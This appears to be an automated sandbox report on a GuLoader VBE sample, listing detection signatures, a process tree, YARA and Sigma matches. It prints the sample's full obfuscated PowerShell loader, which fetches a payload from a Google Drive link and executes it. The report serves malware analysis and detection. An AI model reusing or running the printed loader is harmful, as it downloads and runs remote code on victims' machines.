Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EL-25-536_40005512_Le Cuivre_23102024.vbe

Overview

General Information

Sample name:EL-25-536_40005512_Le Cuivre_23102024.vbe
Analysis ID:1540843
MD5:575f235ff45c6a6697fba7172ff403a8
SHA1:d9ed6dc4fd26fbed5d50db60ac696d6eac1eed37
SHA256:571c0365a3bd9d99f9df9c8e91473425db45064a304a4882f8b4e6d14ec6d81a
Tags:vbeuser-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay.acedp SkydREr trOFilarTHandeObrummCFrowzOtwigslBowleTO kalY Re uPBondeefarew]Tryks:kowto:Uve,sTH emsLNedtrS Omni1Uncu,2Opbyg ');$Halmknippernes=$Kalligrafi[0];$Bedstemanden=(Plumet ' Udtr$ AfgagofficlNonstO Kongb micra UndelSemil: M.rfSq.ateHLast iNedstTPelsvHCusc,eWo dee MonelBille=Dmmekn Ga eeCau oWAllev-SkannOrie.eBEgnsbj Antee QuilcOutsaTCrus SmadrSAcidiY Sou.S SkibtvanitE Tre MAaled.Fon,tN A.miE T edtquins.KaabeWStrave SperbPun,tCInaqul h nrITurisE tyvenT lvrTDemur ');Extralegal ($Bedstemanden);Extralegal (Plumet ',ocks$Misa.SSkudahRottei GnidtReparhFlin,eTa eleUnadvlU tto.TakleH Tille Milla XylodMenine Mar.r Rbens ackd[Ente $ eneFFljlse StilrD doei afskeBarrigsucceiOwasurSjllao nceseSalgsnC eers Bl,s]Aberr=Bryst$PlissRAsia,eAffolsM.dleeEscarrEntrev FitnaLagentDrenciMezzaoUnpernO erss WreasBistrl Lad iPodiapAg rap.odereN bonrU,kin ');$Bathroot=Plumet 'Psal $StivfSBre ih UomtiAarlet Funkhsprede TeeneMonstl.elig.BagatDTightoSter.wF emlnSamirlme ero La iaAffaldLicheFRetouiBoyunlsenlaeD cis(Normo$HumphH iljaa glolF imamNovenkIpom,nIridii oldsp Folkp SupeeFi,kerResumn ForteCubb,sProdu,In,sa$helv.T WorluNabk.nindrygKoppasCoe apGluttaWhoritBefamsFarmb)O fin ';$Tungspats=$Stenotypist;Extralegal (Plumet 'Digte$Ant dgSta kL TourOTabetbMonesA U arLPodz : PyrofRefo.oCle ur S opUKindhrSp ite BoraNLnmodifilstN storG ilpsT,afiS Motik UrocaL snid Pr se ChasrN,nvisEncha2a iog3Konsu=Pitsa(UndepTManneeS,rinsMyrioTSigva- IntepI,dusaKonfotIrnachR.mst hamm$ ,akutargkeUFora.nLeca gSuperS ConsP u.esA ExamtBibliSWefti)Lensg ');while (!$Forureningsskaders23) {Extralegal (Plumet 'Marm $ ygelgBefarlTyve o SandbQuan,aH izelO,ers:Bl ndSLaterpSclera,lvberProvoe SrlokT ianaDe tasBjeacsappreeResp b Dydse Gengs SnydtUndi y fremrRigs e BeknrParene kheps den=A veg$ChecktSjlekrGaffeuG aameCo pa ') ;Extralegal $Bathroot;Extralegal (Plumet 'LearnSSolinTbalsaaIntraRSigtvtM sku- BistSVentrlDrejeEPred eMyriaP.ikke olde4Kavit ');Extralegal (Plumet ' ,ors$FumeuGEjendlHalbeOTerribNonseA Aga LVi.rn:CursoftillioStellrDiazoUFlammRQuickERevoln RavnI rhven BeskGSvlgesEnebosUnr pKGenerAVandld FiskESalgsRMalknSHe to2torun3Unflo=Skysk(Frge TSimioeSuborSHy.oaTSm.gr- Knorp CortAElimaTTangeHT rsk Bed.m$HandltJac eUUntorn AvergNontispionePSuperA DemeT .upes,iner) uggy ') ;Extralegal (Plumet ' Acet$Excreg SubllMyxoboS orob liskAOscilLCarbu:PotenF sertoemeliR SvagsAlimeiK,udeN UndiKReciteStyleL.aaliSO erbeT.araRNonpenAmatrEboligsA phi=Komm $Parmeg.nfumLSo,keONonchbNeuria ZlotlArk v: Hab,CGangloMicroAPairpcBl dfHSlutswFiffihUn luIanisopBenga+Ostle+,urne%carto$Uni.ekBismaaSkumplSprawLPapiriHyph GSal eRPil eAAlu afNeur IJord .Amph,CScripoCult.u Dv rnDekomTTotem ') ;$Halmknippernes=$Kalligrafi[$Forsinkelsernes];}$Forskrerbrt=328123;$Desinficeringers=31343;Extralegal (Plumet 'Desig$Antong orlaLSprucOGirseBSal ta CrucLArome:afskrS Ang tRntgeVBorusNBowsiEHold,rGobsmSrecli Auto=Calqu SpillGOutsoeAntigtBr ss- CoriCVaageOfrdigN Blo,T FlleEDe alNUfredTSgeo, Cisiu$T,lveT .ndeuOve.aNSmigeGUdnytsOk,lePW ttma Kwmit mmolSbhmer ');Extralegal (Plumet 'Botfl$Para,gKphdil,cealoAftrab,estra,rvill,tent:Epip BS ikkiSemessFrsteo ituinHindeo SammkQuadrs Arb eCfhkrrUdbygn BereeSynkrs Frem2Cod.b4Busc 4P.rsi Hloft=Ud yk All.r[Om edSAmas,yAktivsAll ntPhre,e kontmUnder. M rcCNoc.noMoonsnG mmivB evbe NonhrUddantSjusk]phary:F rdr:su erFDrivvr BlinoNetvrmV.olaBPyjamaH.uses Ri.leSi ho6 Mer 4Sagk Sl part Gr irCrowniPuppenUltrag Unto(Dekad$armb,SMonactImplevPlebinComoreInvulrSkkeps.ller)Bredd ');Extralegal (Plumet 'Hjert$,ijouGhardhLDibliOEpicebLo pia,nwanlStof,:SlattgNoninRPartieSvirpwUtrichDampmOVoveuU ricknDandrD rot rese=.catt Inte [Hest SCockayUplifSCo onT yskeEFemkaMSkr v.ImpurtIc noESkiheXCoralTprosp. FloseBecouNVeraycUndisoAdresd ResmiTurboN SkilgU ska] Pneo:Willo:tarveaStatsS RubeCtranqIA atrIQuill. levaG,uzukeRehosTElvenSUdd bT OverRRakl I luskn ygieGSysop(Fr ct$origibTrafiI Dests .aceo MousnT ipaO ,flvkTarapsSrestERepaiRIldnenIndfrEUnsi.sPrede2 Udla4.erog4Lentn)Extem ');Extralegal (Plumet 'Fal e$,agdegGametlindtgoFilmebUdenraComprLEkspo:P stmAJamboNJ,rdasKevi,pThreanS.oleDSummaeComp,NMek.nDSej sE Spons lesh= Damm$ C.stGnaturRF.ansEbr deWLege.H,nsupOBindiUCorncNCunniD Wa t.NyvursJeannuDrageBArt sS BrobTAaregRD,voviPochoNM crog D,se(Oofyu$ Sk yFAbscioForsorSeletS DevekR,ahurGidsee D sir Sem,b HerrRSubj TPalmi,Nonde$ReseddChitie ogtas V rmi HenvNbef,rf Bru,I EkskC ImbreOver,rEnsilIUps,dnLysfoGF,ngoeFitterCapi s Srgm) Fuld ');Extralegal $Anspndendes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4312 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay.acedp SkydREr trOFilarTHandeObrummCFrowzOtwigslBowleTO kalY Re uPBondeefarew]Tryks:kowto:Uve,sTH emsLNedtrS Omni1Uncu,2Opbyg ');$Halmknippernes=$Kalligrafi[0];$Bedstemanden=(Plumet ' Udtr$ AfgagofficlNonstO Kongb micra UndelSemil: M.rfSq.ateHLast iNedstTPelsvHCusc,eWo dee MonelBille=Dmmekn Ga eeCau oWAllev-SkannOrie.eBEgnsbj Antee QuilcOutsaTCrus SmadrSAcidiY Sou.S SkibtvanitE Tre MAaled.Fon,tN A.miE T edtquins.KaabeWStrave SperbPun,tCInaqul h nrITurisE tyvenT lvrTDemur ');Extralegal ($Bedstemanden);Extralegal (Plumet ',ocks$Misa.SSkudahRottei GnidtReparhFlin,eTa eleUnadvlU tto.TakleH Tille Milla XylodMenine Mar.r Rbens ackd[Ente $ eneFFljlse StilrD doei afskeBarrigsucceiOwasurSjllao nceseSalgsnC eers Bl,s]Aberr=Bryst$PlissRAsia,eAffolsM.dleeEscarrEntrev FitnaLagentDrenciMezzaoUnpernO erss WreasBistrl Lad iPodiapAg rap.odereN bonrU,kin ');$Bathroot=Plumet 'Psal $StivfSBre ih UomtiAarlet Funkhsprede TeeneMonstl.elig.BagatDTightoSter.wF emlnSamirlme ero La iaAffaldLicheFRetouiBoyunlsenlaeD cis(Normo$HumphH iljaa glolF imamNovenkIpom,nIridii oldsp Folkp SupeeFi,kerResumn ForteCubb,sProdu,In,sa$helv.T WorluNabk.nindrygKoppasCoe apGluttaWhoritBefamsFarmb)O fin ';$Tungspats=$Stenotypist;Extralegal (Plumet 'Digte$Ant dgSta kL TourOTabetbMonesA U arLPodz : PyrofRefo.oCle ur S opUKindhrSp ite BoraNLnmodifilstN storG ilpsT,afiS Motik UrocaL snid Pr se ChasrN,nvisEncha2a iog3Konsu=Pitsa(UndepTManneeS,rinsMyrioTSigva- IntepI,dusaKonfotIrnachR.mst hamm$ ,akutargkeUFora.nLeca gSuperS ConsP u.esA ExamtBibliSWefti)Lensg ');while (!$Forureningsskaders23) {Extralegal (Plumet 'Marm $ ygelgBefarlTyve o SandbQuan,aH izelO,ers:Bl ndSLaterpSclera,lvberProvoe SrlokT ianaDe tasBjeacsappreeResp b Dydse Gengs SnydtUndi y fremrRigs e BeknrParene kheps den=A veg$ChecktSjlekrGaffeuG aameCo pa ') ;Extralegal $Bathroot;Extralegal (Plumet 'LearnSSolinTbalsaaIntraRSigtvtM sku- BistSVentrlDrejeEPred eMyriaP.ikke olde4Kavit ');Extralegal (Plumet ' ,ors$FumeuGEjendlHalbeOTerribNonseA Aga LVi.rn:CursoftillioStellrDiazoUFlammRQuickERevoln RavnI rhven BeskGSvlgesEnebosUnr pKGenerAVandld FiskESalgsRMalknSHe to2torun3Unflo=Skysk(Frge TSimioeSuborSHy.oaTSm.gr- Knorp CortAElimaTTangeHT rsk Bed.m$HandltJac eUUntorn AvergNontispionePSuperA DemeT .upes,iner) uggy ') ;Extralegal (Plumet ' Acet$Excreg SubllMyxoboS orob liskAOscilLCarbu:PotenF sertoemeliR SvagsAlimeiK,udeN UndiKReciteStyleL.aaliSO erbeT.araRNonpenAmatrEboligsA phi=Komm $Parmeg.nfumLSo,keONonchbNeuria ZlotlArk v: Hab,CGangloMicroAPairpcBl dfHSlutswFiffihUn luIanisopBenga+Ostle+,urne%carto$Uni.ekBismaaSkumplSprawLPapiriHyph GSal eRPil eAAlu afNeur IJord .Amph,CScripoCult.u Dv rnDekomTTotem ') ;$Halmknippernes=$Kalligrafi[$Forsinkelsernes];}$Forskrerbrt=328123;$Desinficeringers=31343;Extralegal (Plumet 'Desig$Antong orlaLSprucOGirseBSal ta CrucLArome:afskrS Ang tRntgeVBorusNBowsiEHold,rGobsmSrecli Auto=Calqu SpillGOutsoeAntigtBr ss- CoriCVaageOfrdigN Blo,T FlleEDe alNUfredTSgeo, Cisiu$T,lveT .ndeuOve.aNSmigeGUdnytsOk,lePW ttma Kwmit mmolSbhmer ');Extralegal (Plumet 'Botfl$Para,gKphdil,cealoAftrab,estra,rvill,tent:Epip BS ikkiSemessFrsteo ituinHindeo SammkQuadrs Arb eCfhkrrUdbygn BereeSynkrs Frem2Cod.b4Busc 4P.rsi Hloft=Ud yk All.r[Om edSAmas,yAktivsAll ntPhre,e kontmUnder. M rcCNoc.noMoonsnG mmivB evbe NonhrUddantSjusk]phary:F rdr:su erFDrivvr BlinoNetvrmV.olaBPyjamaH.uses Ri.leSi ho6 Mer 4Sagk Sl part Gr irCrowniPuppenUltrag Unto(Dekad$armb,SMonactImplevPlebinComoreInvulrSkkeps.ller)Bredd ');Extralegal (Plumet 'Hjert$,ijouGhardhLDibliOEpicebLo pia,nwanlStof,:SlattgNoninRPartieSvirpwUtrichDampmOVoveuU ricknDandrD rot rese=.catt Inte [Hest SCockayUplifSCo onT yskeEFemkaMSkr v.ImpurtIc noESkiheXCoralTprosp. FloseBecouNVeraycUndisoAdresd ResmiTurboN SkilgU ska] Pneo:Willo:tarveaStatsS RubeCtranqIA atrIQuill. levaG,uzukeRehosTElvenSUdd bT OverRRakl I luskn ygieGSysop(Fr ct$origibTrafiI Dests .aceo MousnT ipaO ,flvkTarapsSrestERepaiRIldnenIndfrEUnsi.sPrede2 Udla4.erog4Lentn)Extem ');Extralegal (Plumet 'Fal e$,agdegGametlindtgoFilmebUdenraComprLEkspo:P stmAJamboNJ,rdasKevi,pThreanS.oleDSummaeComp,NMek.nDSej sE Spons lesh= Damm$ C.stGnaturRF.ansEbr deWLege.H,nsupOBindiUCorncNCunniD Wa t.NyvursJeannuDrageBArt sS BrobTAaregRD,voviPochoNM crog D,se(Oofyu$ Sk yFAbscioForsorSeletS DevekR,ahurGidsee D sir Sem,b HerrRSubj TPalmi,Nonde$ReseddChitie ogtas V rmi HenvNbef,rf Bru,I EkskC ImbreOver,rEnsilIUps,dnLysfoGF,ngoeFitterCapi s Srgm) Fuld ');Extralegal $Anspndendes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • nJPhzxOixucOn.exe (PID: 5964 cmdline: "C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 6524 cmdline: "C:\Windows\SysWOW64\dllhost.exe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • nJPhzxOixucOn.exe (PID: 2448 cmdline: "C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.2132644099.0000000008BA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000006.00000002.2116981246.0000000005E35000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000006.00000002.2133348411.0000000009DD1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 6044JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_6044.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_4312.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xada3:$b2: ::FromBase64String(
              • 0x9e0b:$s1: -join
              • 0x35b7:$s4: +=
              • 0x3679:$s4: +=
              • 0x78a0:$s4: +=
              • 0x99bd:$s4: +=
              • 0x9ca7:$s4: +=
              • 0x9ded:$s4: +=
              • 0x14222:$s4: +=
              • 0x142a2:$s4: +=
              • 0x14368:$s4: +=
              • 0x143e8:$s4: +=
              • 0x145be:$s4: +=
              • 0x14642:$s4: +=
              • 0xa647:$e4: Get-WmiObject
              • 0xa836:$e4: Get-Process
              • 0xa88e:$e4: Start-Process
              • 0x14eab:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe", ProcessId: 7100, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.142, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7128, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe", ProcessId: 7100, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda 